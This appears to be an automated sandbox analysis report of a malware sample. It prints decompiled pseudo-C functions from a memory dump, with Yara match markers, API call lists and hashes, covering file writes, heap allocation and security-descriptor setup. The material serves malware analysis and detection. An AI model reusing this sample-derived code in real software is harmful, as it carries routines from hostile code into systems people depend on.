                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                                                                                • Opcode ID: de8c5ce6f2affbd066abaadff8faf66a667c7aebf727557bb476bd0098ea218e
                                                                                                                                                                                                • Instruction ID: cc8ae8af23ed2f5e8bb71ea6e73ebb68837f28405d1e1831d7261b90b3b7492b
                                                                                                                                                                                                • Opcode Fuzzy Hash: de8c5ce6f2affbd066abaadff8faf66a667c7aebf727557bb476bd0098ea218e
                                                                                                                                                                                                • Instruction Fuzzy Hash: 90F06571A0151CABDF612BA4AD01BBE77589F11B75F240241FB14EB1D1DF68ED0086EA
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E00AFA639(WCHAR* __ecx, long __edx) {
                                                                                                                                                                                                				intOrPtr _t6;
                                                                                                                                                                                                				long _t12;
                                                                                                                                                                                                				void* _t13;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t12 = __edx;
                                                                                                                                                                                                				_t13 = CreateFileW(__ecx, 0x40000000, 0, 0, __edx, 0x80, 0);
                                                                                                                                                                                                				if(_t13 != 0xffffffff) {
                                                                                                                                                                                                					if(_t12 == 4) {
                                                                                                                                                                                                						_t6 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                						 *((intOrPtr*)(_t6 + 0x80))(_t13, 0, 0, 2);
                                                                                                                                                                                                					}
                                                                                                                                                                                                					return _t13;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                			}







                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000000,00000000,00AF8F1A), ref: 00AFA654
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                • Opcode ID: 12b642f749f5c504ac63d0bffe408d955602b8fbfde8dc848d54a7e3d3aabef0
                                                                                                                                                                                                • Instruction ID: 35c5933db662a1c9330cf247ce96b891004d8e2ea7c85e31c0397354fa171919
                                                                                                                                                                                                • Opcode Fuzzy Hash: 12b642f749f5c504ac63d0bffe408d955602b8fbfde8dc848d54a7e3d3aabef0
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4FE09AB27001187EE76017A8ACC8FB726ACE7A57F9F060730F729C72A0CA218C008271
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E00AFA7BF(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                				signed int _t5;
                                                                                                                                                                                                				void* _t6;
                                                                                                                                                                                                				void* _t10;
                                                                                                                                                                                                				long _t15;
                                                                                                                                                                                                				void* _t17;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t15 = 2;
                                                                                                                                                                                                				_t5 = E00AFA639(_a4, _t15);
                                                                                                                                                                                                				_t17 = _t5;
                                                                                                                                                                                                				if(_t17 != 0) {
                                                                                                                                                                                                					_t6 = E00AFA69E(_t17, _a8, _a12); // executed
                                                                                                                                                                                                					if(_t6 != 0) {
                                                                                                                                                                                                						FindCloseChangeNotification(_t17);
                                                                                                                                                                                                						return 0;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t10 = 0xfffffffe;
                                                                                                                                                                                                					return _t10;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				return _t5 | 0xffffffff;
                                                                                                                                                                                                			}









                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                • Opcode ID: de7874ee2f565e643f18f95b0b7a8edb132e8fdc1259b2e7794c3e67815dbeb1
                                                                                                                                                                                                • Instruction ID: 6feb8462e76c023e19e644ef08aed058889646cf1784a0f58d4d99cf8a416fc3
                                                                                                                                                                                                • Opcode Fuzzy Hash: de7874ee2f565e643f18f95b0b7a8edb132e8fdc1259b2e7794c3e67815dbeb1
                                                                                                                                                                                                • Instruction Fuzzy Hash: C7E0D87620472E6B8B11ABE8ED90DFA37649F683707204711FA2ECB2C1DE30D94146C6
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E00AF9887(void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                				intOrPtr _t24;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t24 = _a4;
                                                                                                                                                                                                				if(E00AFA501( *(_t24 + 0x1c), 0x3a98) >= 0) {
                                                                                                                                                                                                					FindCloseChangeNotification( *(_t24 + 0x1c));
                                                                                                                                                                                                					 *((intOrPtr*)(_t24 + 0x18)) =  *((intOrPtr*)(_t24 + 8))( *((intOrPtr*)(_t24 + 0xc)));
                                                                                                                                                                                                					if(( *(_t24 + 0x14) & 0x00000001) == 0) {
                                                                                                                                                                                                						E00AF982B(_t24, 1);
                                                                                                                                                                                                					}
                                                                                                                                                                                                					return  *((intOrPtr*)(_t24 + 0x18));
                                                                                                                                                                                                				}
                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                			}





                                                                                                                                                                                                APIs
                                                                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(?), ref: 00AF98AB
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2591292051-0
                                                                                                                                                                                                • Opcode ID: 81b10f2f4e83e19184985194169bb94f7a8910210e8f7c146ea58a1fcb2a03e8
                                                                                                                                                                                                • Instruction ID: 802afc66a314210481480dcc0fd6a3d495c411d5067de9bd027eb8f5ea68e422
                                                                                                                                                                                                • Opcode Fuzzy Hash: 81b10f2f4e83e19184985194169bb94f7a8910210e8f7c146ea58a1fcb2a03e8
                                                                                                                                                                                                • Instruction Fuzzy Hash: A0F030312007099BC720AFA6E944A77B7F9EF663947108929F68787A61DA31F80597C1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 89%
                                                                                                                                                                                                			E00AFB379(void* __ecx) {
                                                                                                                                                                                                				intOrPtr _t4;
                                                                                                                                                                                                				void* _t5;
                                                                                                                                                                                                				intOrPtr _t6;
                                                                                                                                                                                                				void* _t12;
                                                                                                                                                                                                				void* _t13;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t4 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                				_t13 = 0;
                                                                                                                                                                                                				_t5 =  *((intOrPtr*)(_t4 + 0xbc))(2, 0, __ecx);
                                                                                                                                                                                                				_t12 = _t5;
                                                                                                                                                                                                				if(_t12 != 0) {
                                                                                                                                                                                                					_t6 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                					_push(_t12);
                                                                                                                                                                                                					if( *((intOrPtr*)(_t6 + 0xc0))() != 0) {
                                                                                                                                                                                                						_t13 = 1;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					FindCloseChangeNotification(_t12);
                                                                                                                                                                                                					return _t13;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				return _t5;
                                                                                                                                                                                                			}









                                                                                                                                                                                                APIs
                                                                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,00AF3C7D,?,?,?,?,?,?,?,?,00AF3D62,00000000), ref: 00AFB3AC
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2591292051-0
                                                                                                                                                                                                • Opcode ID: 96fde83953427d72aad55454883a7bce16e96b4c2bd700452a83d942f746f743
                                                                                                                                                                                                • Instruction ID: 91aaab4aba3f97c035f9efe97b425e230fa01178333589c32e73f764c56957b1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 96fde83953427d72aad55454883a7bce16e96b4c2bd700452a83d942f746f743
                                                                                                                                                                                                • Instruction Fuzzy Hash: ECE04F363101219BD6204BA9ED4CF777A79EBE5A51B060268FA15CB211CF21C802C7B1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 68%
                                                                                                                                                                                                			E00AFA67D(WCHAR* __ecx) {
                                                                                                                                                                                                				signed int _t5;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
                                                                                                                                                                                                				_t2 = _t5 + 1; // 0x1
                                                                                                                                                                                                				asm("sbb ecx, ecx");
                                                                                                                                                                                                				return _t5 &  ~_t2;
                                                                                                                                                                                                			}





                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00AFA70B,00000000,00000400,00000000,00AFF8F7,00AFF8F7,?,00AFFA98,00000000), ref: 00AFA691
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                • Opcode ID: 4702864ff185202412dc518f03d47bb9657b799d0b40f37721d47d373f6ca1d4
                                                                                                                                                                                                • Instruction ID: 69429ab9919cf0e4591e47c1b63d5dd9b0028a2230de259e54fc6012bf39e033
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4702864ff185202412dc518f03d47bb9657b799d0b40f37721d47d373f6ca1d4
                                                                                                                                                                                                • Instruction Fuzzy Hash: 03D012B13601017EFB1C8B34DD56F71329CD710701F11065C7A16D60D1C955D5048710
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E00AF4998() {
                                                                                                                                                                                                				int _t3;
                                                                                                                                                                                                				void* _t4;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t3 = FindCloseChangeNotification( *0xb0e748);
                                                                                                                                                                                                				_t4 =  *0xb0e748; // 0x0
                                                                                                                                                                                                				_t5 =  !=  ? 0 : _t4;
                                                                                                                                                                                                				 *0xb0e748 =  !=  ? 0 : _t4;
                                                                                                                                                                                                				return _t3;
                                                                                                                                                                                                			}






                                                                                                                                                                                                APIs
                                                                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(00AF5086), ref: 00AF49A3
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2591292051-0
                                                                                                                                                                                                • Opcode ID: 7b3604a2caf5f0f1036a2b3a535c5e63340eec4202a12e6300b20e3694a98914
                                                                                                                                                                                                • Instruction ID: b1205d8ca8d486af30fba29e808c80cb099b6cd20addf273fe7e801ad33c5833
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b3604a2caf5f0f1036a2b3a535c5e63340eec4202a12e6300b20e3694a98914
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8DC002F06016099FFB0CDB2AED5481537E6EBA82013596868F42287631DF31DC51DA12
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E00AF85E5(long _a4) {
                                                                                                                                                                                                				void* _t2;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t2 = RtlAllocateHeap( *0xb0e768, 8, _a4); // executed
                                                                                                                                                                                                				return _t2;
                                                                                                                                                                                                			}




                                                                                                                                                                                                0x00af85f3
                                                                                                                                                                                                0x00af85fa

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000008,?,?,00AF8F65,00000100,?,00AF5FAC), ref: 00AF85F3
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E00AFB2AB(WCHAR* __ecx) {
                                                                                                                                                                                                
                                                                                                                                                                                                				return 0 | GetFileAttributesW(__ecx) != 0xffffffff;
                                                                                                                                                                                                			}




                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(00000000,00AF4E6E), ref: 00AFB2B1
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E00AF85D0() {
                                                                                                                                                                                                				void* _t1;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t1 = HeapCreate(0, 0x80000, 0); // executed
                                                                                                                                                                                                				 *0xb0e768 = _t1;
                                                                                                                                                                                                				return _t1;
                                                                                                                                                                                                			}





                                                                                                                                                                                                APIs
                                                                                                                                                                                                • HeapCreate.KERNELBASE(00000000,00080000,00000000,00AF5F88), ref: 00AF85D9
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateHeap
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 10892065-0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 59%
                                                                                                                                                                                                			E00AFBD52() {
                                                                                                                                                                                                				char _v8;
                                                                                                                                                                                                				void* _v12;
                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                				short _v20;
                                                                                                                                                                                                				char _v24;
                                                                                                                                                                                                				short _v28;
                                                                                                                                                                                                				char _v32;
                                                                                                                                                                                                				intOrPtr _v36;
                                                                                                                                                                                                				intOrPtr _v40;
                                                                                                                                                                                                				intOrPtr _v44;
                                                                                                                                                                                                				intOrPtr _v56;
                                                                                                                                                                                                				intOrPtr _v60;
                                                                                                                                                                                                				intOrPtr _v64;
                                                                                                                                                                                                				intOrPtr _v68;
                                                                                                                                                                                                				intOrPtr _v72;
                                                                                                                                                                                                				intOrPtr _v76;
                                                                                                                                                                                                				intOrPtr _v88;
                                                                                                                                                                                                				intOrPtr _v92;
                                                                                                                                                                                                				void _v96;
                                                                                                                                                                                                				intOrPtr _t58;
                                                                                                                                                                                                				intOrPtr _t61;
                                                                                                                                                                                                				intOrPtr _t63;
                                                                                                                                                                                                				intOrPtr _t65;
                                                                                                                                                                                                				intOrPtr _t67;
                                                                                                                                                                                                				intOrPtr _t70;
                                                                                                                                                                                                				intOrPtr _t73;
                                                                                                                                                                                                				intOrPtr _t77;
                                                                                                                                                                                                				intOrPtr _t79;
                                                                                                                                                                                                				intOrPtr _t81;
                                                                                                                                                                                                				intOrPtr _t85;
                                                                                                                                                                                                				intOrPtr _t87;
                                                                                                                                                                                                				signed int _t90;
                                                                                                                                                                                                				void* _t92;
                                                                                                                                                                                                				intOrPtr _t93;
                                                                                                                                                                                                				void* _t98;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t90 = 8;
                                                                                                                                                                                                				_v28 = 0xf00;
                                                                                                                                                                                                				_v32 = 0;
                                                                                                                                                                                                				_v24 = 0;
                                                                                                                                                                                                				memset( &_v96, 0, _t90 << 2);
                                                                                                                                                                                                				_v20 = 0x100;
                                                                                                                                                                                                				_push( &_v12);
                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                				_v16 = 0;
                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                                                				_push(1);
                                                                                                                                                                                                				_v12 = 0;
                                                                                                                                                                                                				_push( &_v24);
                                                                                                                                                                                                				_t58 =  *0xb0e68c; // 0x4d3f890
                                                                                                                                                                                                				_t98 = 0;
                                                                                                                                                                                                				if( *((intOrPtr*)(_t58 + 0xc))() == 0) {
                                                                                                                                                                                                					L14:
                                                                                                                                                                                                					if(_v8 != 0) {
                                                                                                                                                                                                						_t67 =  *0xb0e68c; // 0x4d3f890
                                                                                                                                                                                                						 *((intOrPtr*)(_t67 + 0x10))(_v8);
                                                                                                                                                                                                					}
                                                                                                                                                                                                					if(_v12 != 0) {
                                                                                                                                                                                                						_t65 =  *0xb0e68c; // 0x4d3f890
                                                                                                                                                                                                						 *((intOrPtr*)(_t65 + 0x10))(_v12);
                                                                                                                                                                                                					}
                                                                                                                                                                                                					if(_t98 != 0) {
                                                                                                                                                                                                						_t63 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                						 *((intOrPtr*)(_t63 + 0x34))(_t98);
                                                                                                                                                                                                					}
                                                                                                                                                                                                					if(_v16 != 0) {
                                                                                                                                                                                                						_t61 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                						 *((intOrPtr*)(_t61 + 0x34))(_v16);
                                                                                                                                                                                                					}
                                                                                                                                                                                                					L22:
                                                                                                                                                                                                					return _t98;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_v68 = _v12;
                                                                                                                                                                                                				_t70 =  *0xb0e688; // 0xb20000
                                                                                                                                                                                                				_t92 = 2;
                                                                                                                                                                                                				_v96 = 0x1fffff;
                                                                                                                                                                                                				_v92 = 0;
                                                                                                                                                                                                				_v88 = 3;
                                                                                                                                                                                                				_v76 = 0;
                                                                                                                                                                                                				_v72 = 5;
                                                                                                                                                                                                				if( *((intOrPtr*)(_t70 + 4)) != 6 ||  *((intOrPtr*)(_t70 + 8)) < 0) {
                                                                                                                                                                                                					if( *((intOrPtr*)(_t70 + 4)) < 0xa) {
                                                                                                                                                                                                						goto L7;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					goto L4;
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					L4:
                                                                                                                                                                                                					_push( &_v8);
                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                					_push(1);
                                                                                                                                                                                                					_push(_t92);
                                                                                                                                                                                                					_push(_t92);
                                                                                                                                                                                                					_push( &_v32);
                                                                                                                                                                                                					_t85 =  *0xb0e68c; // 0x4d3f890
                                                                                                                                                                                                					if( *((intOrPtr*)(_t85 + 0xc))() == 0) {
                                                                                                                                                                                                						goto L14;
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						_t87 = _v8;
                                                                                                                                                                                                						if(_t87 != 0) {
                                                                                                                                                                                                							_push(2);
                                                                                                                                                                                                							_pop(1);
                                                                                                                                                                                                							_v64 = 0x1fffff;
                                                                                                                                                                                                							_v60 = 1;
                                                                                                                                                                                                							_v56 = 3;
                                                                                                                                                                                                							_v44 = 0;
                                                                                                                                                                                                							_v40 = 1;
                                                                                                                                                                                                							_v36 = _t87;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						L7:
                                                                                                                                                                                                						_push( &_v16);
                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                						_push( &_v96);
                                                                                                                                                                                                						_t73 =  *0xb0e68c; // 0x4d3f890
                                                                                                                                                                                                						_push(1); // executed
                                                                                                                                                                                                						if( *((intOrPtr*)(_t73 + 8))() != 0) {
                                                                                                                                                                                                							goto L14;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_t98 = LocalAlloc(0x40, 0x14);
                                                                                                                                                                                                						if(_t98 == 0) {
                                                                                                                                                                                                							goto L14;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_t93 =  *0xb0e68c; // 0x4d3f890
                                                                                                                                                                                                						_push(1);
                                                                                                                                                                                                						_push(_t98);
                                                                                                                                                                                                						if( *((intOrPtr*)(_t93 + 0x90))() == 0) {
                                                                                                                                                                                                							goto L14;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_t77 =  *0xb0e68c; // 0x4d3f890
                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                						_push(_v16);
                                                                                                                                                                                                						_push(1);
                                                                                                                                                                                                						_push(_t98);
                                                                                                                                                                                                						if( *((intOrPtr*)(_t77 + 0x94))() == 0) {
                                                                                                                                                                                                							goto L14;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						if(_v8 != 0) {
                                                                                                                                                                                                							_t81 =  *0xb0e68c; // 0x4d3f890
                                                                                                                                                                                                							 *((intOrPtr*)(_t81 + 0x10))(_v8);
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_t79 =  *0xb0e68c; // 0x4d3f890
                                                                                                                                                                                                						 *((intOrPtr*)(_t79 + 0x10))(_v12);
                                                                                                                                                                                                						goto L22;
                                                                                                                                                                                                					}
                                                                                                                                                                                                				}
                                                                                                                                                                                                			}






































                                                                                                                                                                                                0x00afbe68
                                                                                                                                                                                                0x00afbe69
                                                                                                                                                                                                0x00afbe6c
                                                                                                                                                                                                0x00afbe6e
                                                                                                                                                                                                0x00afbe77
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afbe7c
                                                                                                                                                                                                0x00afbe7e
                                                                                                                                                                                                0x00afbe86
                                                                                                                                                                                                0x00afbe86
                                                                                                                                                                                                0x00afbe89
                                                                                                                                                                                                0x00afbe91
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afbe91
                                                                                                                                                                                                0x00afbe00

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000014), ref: 00AFBE44
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AllocLocal
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3494564517-0
                                                                                                                                                                                                • Opcode ID: 59100356812aa89ac76d63a9f37a06c647e9385b368d25993c9c8494c60d64d8
                                                                                                                                                                                                • Instruction ID: 3091ade37c26b2bd12b4420149e86318af4e77ab4b7826d1a425b56254597231
                                                                                                                                                                                                • Opcode Fuzzy Hash: 59100356812aa89ac76d63a9f37a06c647e9385b368d25993c9c8494c60d64d8
                                                                                                                                                                                                • Instruction Fuzzy Hash: FF513B71A10208EFDB14CFD9D988AEDBBF8FF54701F11856AF214AB260D7718944CB61
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 88%
                                                                                                                                                                                                			E00AFFA01(void* __edx) {
                                                                                                                                                                                                				char _v8;
                                                                                                                                                                                                				char _v12;
                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                				char _v20;
                                                                                                                                                                                                				char _v24;
                                                                                                                                                                                                				intOrPtr _t25;
                                                                                                                                                                                                				char _t26;
                                                                                                                                                                                                				intOrPtr _t28;
                                                                                                                                                                                                				void* _t30;
                                                                                                                                                                                                				void* _t35;
                                                                                                                                                                                                				char _t37;
                                                                                                                                                                                                				intOrPtr _t38;
                                                                                                                                                                                                				char _t41;
                                                                                                                                                                                                				intOrPtr _t50;
                                                                                                                                                                                                				intOrPtr _t51;
                                                                                                                                                                                                				intOrPtr* _t62;
                                                                                                                                                                                                				intOrPtr _t65;
                                                                                                                                                                                                				char* _t66;
                                                                                                                                                                                                				intOrPtr _t68;
                                                                                                                                                                                                				char _t77;
                                                                                                                                                                                                				void* _t80;
                                                                                                                                                                                                				void* _t81;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t25 =  *0xb0e654; // 0x4d3fb08
                                                                                                                                                                                                				_t26 = E00AF85E5( *((intOrPtr*)(_t25 + 4))); // executed
                                                                                                                                                                                                				_v12 = _t26;
                                                                                                                                                                                                				if(_t26 != 0) {
                                                                                                                                                                                                					_t62 =  *0xb0e654; // 0x4d3fb08
                                                                                                                                                                                                					if( *((intOrPtr*)(_t62 + 4)) > 0x400) {
                                                                                                                                                                                                						E00AF86C2(_t26,  *_t62, 0x400);
                                                                                                                                                                                                						_v8 = 0;
                                                                                                                                                                                                						_t35 = E00AF109A(_t62, 0x34a);
                                                                                                                                                                                                						_t65 =  *0xb0e688; // 0xb20000
                                                                                                                                                                                                						_t71 =  !=  ? 0x67d : 0x615;
                                                                                                                                                                                                						_t37 = E00AF95C2(_t65,  !=  ? 0x67d : 0x615);
                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                						_push(_t35);
                                                                                                                                                                                                						_t66 = "\\";
                                                                                                                                                                                                						_v24 = _t37;
                                                                                                                                                                                                						_push(_t66);
                                                                                                                                                                                                						_push(_t37);
                                                                                                                                                                                                						_t38 =  *0xb0e688; // 0xb20000
                                                                                                                                                                                                						_push(_t66);
                                                                                                                                                                                                						_v20 = E00AF92C6(_t38 + 0x1020);
                                                                                                                                                                                                						_t41 = E00AFA6EB( &_v8, _t40,  &_v8); // executed
                                                                                                                                                                                                						_v16 = _t41;
                                                                                                                                                                                                						E00AF85B6( &_v24);
                                                                                                                                                                                                						E00AF85B6( &_v20);
                                                                                                                                                                                                						_t72 = _v16;
                                                                                                                                                                                                						_t81 = _t80 + 0x3c;
                                                                                                                                                                                                						_t68 = _v8;
                                                                                                                                                                                                						if(_v16 != 0 && _t68 > 0x400) {
                                                                                                                                                                                                							_t50 =  *0xb0e654; // 0x4d3fb08
                                                                                                                                                                                                							_t51 =  *((intOrPtr*)(_t50 + 4));
                                                                                                                                                                                                							_t52 =  <  ? _t68 : _t51;
                                                                                                                                                                                                							_t53 = ( <  ? _t68 : _t51) + 0xfffffc00;
                                                                                                                                                                                                							E00AF86C2(_v12 + 0x400, _t72 + 0x400, ( <  ? _t68 : _t51) + 0xfffffc00);
                                                                                                                                                                                                							_t68 = _v8;
                                                                                                                                                                                                							_t81 = _t81 + 0xc;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						E00AF85FB( &_v16, _t68); // executed
                                                                                                                                                                                                						E00AF85FB( &_v20, 0xfffffffe);
                                                                                                                                                                                                						_t26 = _v12;
                                                                                                                                                                                                						_t80 = _t81 + 0x10;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t77 = 0;
                                                                                                                                                                                                					while(1) {
                                                                                                                                                                                                						_t28 =  *0xb0e688; // 0xb20000
                                                                                                                                                                                                						_t30 = E00AFA7BF(_t28 + 0x228, _t26, 0x1000); // executed
                                                                                                                                                                                                						_t80 = _t80 + 0xc;
                                                                                                                                                                                                						if(_t30 >= 0) {
                                                                                                                                                                                                							break;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						Sleep(1);
                                                                                                                                                                                                						_t77 = _t77 + 1;
                                                                                                                                                                                                						if(_t77 < 0x2710) {
                                                                                                                                                                                                							_t26 = _v12;
                                                                                                                                                                                                							continue;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						break;
                                                                                                                                                                                                					}
